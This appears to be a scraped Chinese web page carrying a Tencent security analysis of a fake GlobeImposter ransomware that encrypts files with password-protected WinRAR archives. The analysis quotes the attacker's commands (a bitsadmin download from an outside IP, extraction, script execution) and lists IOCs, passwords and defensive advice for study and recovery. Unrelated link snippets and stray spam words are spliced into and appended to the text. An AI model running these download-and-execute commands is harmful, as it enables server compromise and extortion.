近日,腾讯安全御见威胁情报中心发现假冒GlobeImposter勒索病毒正在传播,攻击者疑通过MS SQL爆破入侵服务器,通过网络下载恶意脚本代码,继而执行加密和勒索流程。

令人惊叹的是,这个所谓的“勒索病毒”执行极为简单,只是利用WinRAR加密压缩用户文件,之后再将一封GlobeImposter的勒索消息邮件修改后恐吓用户,通过邮箱联系索取酬金。腾讯安全提醒大家,如遇到此病毒,不要着急着缴纳赎金。该病毒加密压缩的密码明文写在病毒配置信息中,使用这个密码解压缩,文件就能完全恢复。

分析

被勒索服务器疑似被通过MSSQL爆破入侵成功,之后执行以下相关命令行进一步下载执行恶意代码:PHP大马

1)bitsadmin  /transfer n hxxp://47.92.55[.]239/s/jr26.rar C:/Progra~1/jr26.rar

2)C:\Windows\system32\cmd.exe /c C:\Progra~1\winrar\rar.exe e -pp.5p C:\Progra~1\jr26.rar

3)C:\Windows\system32\cmd.exe /c C:\Progra~1\jr26.cmd

jr26.rar为一个带密码的压缩包,密码为p.5p

jr26.rar解压后可得到一个疑似乱码的脚本文件

16进制查看可发现貌似多了0xFF 0xFE 0x0D 0x0A,目测应该是以二进制形式写入的标志,导致文本类识别工具无法查看

去掉0xFF 0xFE 0x0D 0x0A后尝试再次打开,脚本内容已可以正常查看

查看脚本内容可知,主要目的为将指定类型的文件根据后缀分类,分别使用winrar进行加密压缩(通过上图的命令行参数,我们看到加密密码为lll.hc3t6b9s8kz5r26),文件将被压缩至根目录下对应的不同文件名(邮箱.ch_文件后缀类型.随机数字tiger88818)包内,同时删除原始文件。

如下图Decryptcn@protonmail.ch_bax.32419tiger88818包内,则被带密码压缩了所有bak类型的文件

同时,为了防止加密压缩时,数据库文件被占用导致加密中止,病毒还会结束大量的数据库服务相关进程。

最奇葩的来了,加密文件完成后,病毒会通过远程下载一个勒索说明文档

打开说明文档,竟然是知名勒索病毒GlobeImposter的修改版本,该病毒作者只是修改了联系邮箱。奇热影视

进一步观察病毒使用的url可发现攻击者使用的多个文件,分别有勒索说明文档(HOW_TO_BACK_YOUR_FILE*),勒索脚本包(jr26.rar),正规的winrar压缩模块(Rar.exe),猜测为扫描器相关模块包(带未知密码的s.rar包),且病毒使用服务部署在某知名云平台服务器上。

腾讯安全提醒大家,针对此病毒,可以不必着急缴纳赎金,可尝试使用Winrar打开根目录中的*tiger88818后缀文件,然后选择使用密码(lll.hc3t6b9s8kz5r26)解压到指定位置,即可恢复文件。

安全建议

企业用户:

1、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆;

2、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问;

3、采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理;

4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器;

5、对重要文件和数据(数据库等数据)进行定期非本地备份;

6、教育终端用户谨慎下载陌生邮件附件,若非必要,应禁止启用Office宏代码;

7、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务;

8、建议全网安装御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。

个人用户:

1、启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码;

2、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。

IOCs

MD5:

36e826b4a06dcbf039fb8fd6aeca4836

e9613db5620dbcb56903b98532971582

f18b3b2dc6556d60663d70ac411c0ac8

URL
hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILES.txt
hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILESxx.rar
hxxp://47.92.55.239/s/jr26.rar
hxxp://47.92.55.239/s/Rar.exe
hxxp://47.92.55.239/s/s.rar

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密相关推荐

  1. GlobeImposter勒索病毒新变种C4H东山再起

    0x0 背景介绍 随着疫情的缓解,各地企业纷纷复工,而勒索病毒家族也并没有停下他们的脚步.近期深信服安全团队就收到多个地区关于用户主机遭受大面积.C4H勒索病毒入侵的求助,经过安全团队排查分析,确认为 ...

  2. .x3m勒索病毒怎么处理 phobos勒索病毒恢复成功 百分百解密sql文件恢复

    x3m勒索病毒的处理,中了后缀是phobos勒索病毒怎么办? 百分百解密,成功恢复sql被加密文件 如何防范勒索软件***? 备份!备份!备份!使用恢复系统,使勒索软件感染永远不会破坏您的个人数据.最 ...

  3. 【转载】撒旦(Satan 4.2)勒索病毒最新变种加解密分析

    [转载]原文来自:https://bbs.kafan.cn/thread-2135007-1-1.html 一.概述 近日,腾讯御见威胁情报中心检测到一大批的服务器被入侵,入侵后被植入勒索病毒.经过分 ...

  4. 计算机服务器中了360后缀勒索病毒,正确的解密恢复数据库的方式有哪些

    随着计算机技术的不断发展,网络安全也引起了人们重视,近期,我们收到很多企业的求助,企业的计算机服务器被360后缀勒索病毒攻击,导致系统内的数据库全部被加密,重要数据无法被读取,严重影响了企业的正常工作 ...

  5. aes离线解密工具_CrazyCrypt2.1勒索病毒已有一键解密工具

    近日,国外分析人员报出CrazyCrypt 2.1勒索病毒,该勒索病毒集加解密模块于一体,通过AES加密算法对文件进行加密,并弹出交互窗口,受害用户通过支付赎金获取解密密钥后可通过该窗口自行解密.目前 ...

  6. 删除China Lucky系列病毒 后缀.evopro勒索病毒数据恢复方法,解密处理方式

    China Lucky系列,也称为.evopro后缀勒索病毒将加密您的数据,并要求金钱作为赎金,以恢复它.文件将作为辅助文件接收.evopro扩展名,而不对加密文件的原始名称进行任何更改.该.evop ...

  7. 勒索病毒的发展史及解密办法

    勒索病毒就像是游走在互联网里的有害细胞,形式多变且难以捉摸.而它的蔓延,给企业和个人都带来了严重的安全威胁. 所以,今天鹅师傅就来扒一扒关于勒索病毒的那些事以及普通人应该如何有效"自救&qu ...

  8. 关于 GlobeImposter 的勒索病毒说明

    GlobeImposter是近期非常活跃的勒索家族,首次出现在2017年5月份,此后,不断出现新的版本和变种.Globelmposter攻击手法都极其丰富, 通过垃圾邮件.社交工程.渗透扫描.RDP爆 ...

  9. 360病毒|360后缀文件|360勒索病毒|文件被加密为360|中了360勒索病毒怎么办?|数据库文件恢复|数据恢复|

    什么是勒索病毒 勒索病毒是一种目前流行的病毒,通过网络等多种途径传播,受害者电脑感染该病毒后后,病毒将自动加密受害者电脑里的多种常见文件,使得受害者的重要资料文件无法正常使用,或者是锁住用户电脑,并以 ...

  10. 服务器中了勒索病毒,malox勒索病毒的加密方式及如何应对勒索病毒攻击

    随着计算机技术的发展,计算机成为现代人工作和生活中必不可少的电子产品.但随着很多企业和个人用户的信息化建设不断升级,也经常会出现许多恶意软件.其中包括malox勒索病毒,malox勒索病毒是mallo ...

最新文章

  1. android流量监控步骤_Android流量网络监控设计(超级实用版).doc
  2. hdu4885 有 限制的最短路
  3. 汤家凤高等数学基础手写笔记-微分方程
  4. sqlserver大数据归档
  5. wamp安装多版本php,WampServer下安装多个版本的PHP、mysql、apache图文教程
  6. assert和if的使用
  7. Android Intent的使用
  8. javascript设计模式-抽象工厂模式
  9. 一些Euclid空间上的定义
  10. html周报模板,工作周报模板(标准)
  11. 云存储云计算选择开源还是商业版
  12. CnOpenData中国高等学校名单数据
  13. idea繁体字-中文输入法变繁体字
  14. 关联分析:Apriori算法
  15. 计算机考研搜集的资料(408)
  16. android之broadcastreceiver 耳机按键,Android 实时监听耳机按钮事件
  17. 电梯控制算法(5)单电梯场景——屏蔽较近楼层进梯请求
  18. siri语音输入效果_如何输入Siri的语音命令
  19. linux中cat的一个用法(向文件里面添加内容)
  20. 海航集团:曲折的发展历程

热门文章

  1. 一元线性回归的前因后果
  2. 数据库文件的存放位置
  3. html动画转换为桌面动态壁纸,怎么设置电脑动态壁纸-动态桌面,这个功能太好玩了...
  4. 通达信 移动平均算法_中山证券通达信下载-中山证券通达信软件 v1.06 官方版
  5. 易语言组合框基本属性方法事件
  6. 计算机专业英语词汇pdf,计算机专业英语词汇大全(完美打印版).pdf
  7. ATMEGA328P引脚定义图
  8. Linux安装redis最详细的教程
  9. 51单片机点亮数码管,单片机学习的好的办法,单片机例子大全,单片机教程
  10. 高效记忆/形象记忆(08)110数字编码表 21-30